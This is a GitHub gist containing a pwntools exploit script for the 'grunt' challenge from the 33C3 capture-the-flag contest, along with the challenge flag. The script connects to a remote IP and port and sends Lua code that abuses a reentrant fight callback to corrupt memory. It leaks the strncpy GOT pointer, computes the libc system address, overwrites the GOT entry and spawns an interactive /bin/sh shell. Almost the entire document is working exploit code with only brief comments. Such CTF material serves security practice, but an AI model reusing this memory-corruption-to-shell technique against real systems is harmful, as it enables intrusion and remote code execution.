Created
December 29, 2016 22:37
-
-
Save salls/0aa4124fa2ce6c3b4572dccc0e65abb8 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #33C3_4cab52949778211296ac800d072f9032 | |
| #r = process("./grunt") | |
| r = remote("78.46.224.90", 1337) | |
| # names "Lukachu", "Hannobat", "Andyball", "Airmackly" | |
| # idea is that we call fight Airmackly from inside fight to make num_attacks = -1 or 255 | |
| # then we can find a useful pointer (e.g. name of a pokemon afterwards and change it) | |
| lua_code = ''' | |
| name = "AAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" | |
| arr = {} | |
| for i=1,20 do | |
| arr[i] = pokemon.new(name) | |
| end | |
| for i=21,100 do | |
| arr[i] = pokemon.new(name) | |
| end | |
| local foo = arr[24] | |
| counter = 2 | |
| function f2 (a) | |
| counter = counter - 1 | |
| if counter<=0 then | |
| return 1 | |
| end | |
| pokemon.fight(foo, "Airmackly") | |
| return 1 | |
| end | |
| local asdf = pokemon.addAttack(foo, f2) | |
| pokemon.fight(foo, "Airmackly") | |
| -- find a pokemon and a string | |
| string_index = -1 | |
| pokemon_index = -1 | |
| for i=1,255 do | |
| if pokemon.getAttack(foo, i) == 100 then | |
| pokemon_index = i | |
| break | |
| end | |
| end | |
| -- need 2 0's | |
| zero1 = -1 | |
| zero2 = -1 | |
| for i=1,255 do | |
| if pokemon.getAttack(foo, i) == 0 and zero1 == -1 then | |
| zero1 = i | |
| end | |
| if pokemon.getAttack(foo, i) == 0 and i ~= zero1 then | |
| zero2 = i | |
| break | |
| end | |
| end | |
| for i=1,255 do | |
| if pokemon.getAttack(foo, i) == 0x41414141 then | |
| string_index = i | |
| break | |
| end | |
| end | |
| if zero1 == -1 then return -10 end | |
| if zero2 == -1 then return -11 end | |
| if pokemon_index == -1 then return -2 end | |
| if string_index == -1 then return -3 end | |
| -- swap string to find which string it is | |
| pokemon.swapAttack(foo, string_index, string_index+1) | |
| aa = "" | |
| guy = -1 | |
| for i=1,100 do | |
| aa = aa .. string.sub(pokemon.getName(arr[i]), 1, 4) | |
| if string.sub(pokemon.getName(arr[i]), 1, 4) == "BBBB" then | |
| guy = i | |
| break | |
| end | |
| end | |
| if guy == -1 then return -4 end | |
| -- move the 0 into position and write pointer to got | |
| pokemon.swapAttack(foo, zero1, string_index) | |
| pokemon.setName(arr[guy], string.pack("<I", 0x626038)) | |
| -- mov pointer to got over string pointer | |
| pokemon.swapAttack(foo, string_index, pokemon_index+2) | |
| changed_guy = -1 | |
| for i=1,100 do | |
| if string.sub(pokemon.getName(arr[i]), 1, 4) ~= "AAAA" and i ~= guy then | |
| changed_guy = i | |
| break | |
| end | |
| end | |
| leak = pokemon.getName(arr[changed_guy]) | |
| leak = leak .. string.pack("<H",0) | |
| strncpy = string.unpack("<L", leak) | |
| system = strncpy - 0xA57A0 + 0x456D0 | |
| --system = strncpy - 0xA55D0 + 0x45380 -- local | |
| -- write system | |
| aaa = pokemon.new("/bin/sh") | |
| pokemon.setName(arr[changed_guy], string.pack("<L", system)) | |
| pokemon.setName(aaa, "x") | |
| return strncpy | |
| ''' | |
| r.send(lua_code.ljust(0x1000, "\x00")) | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment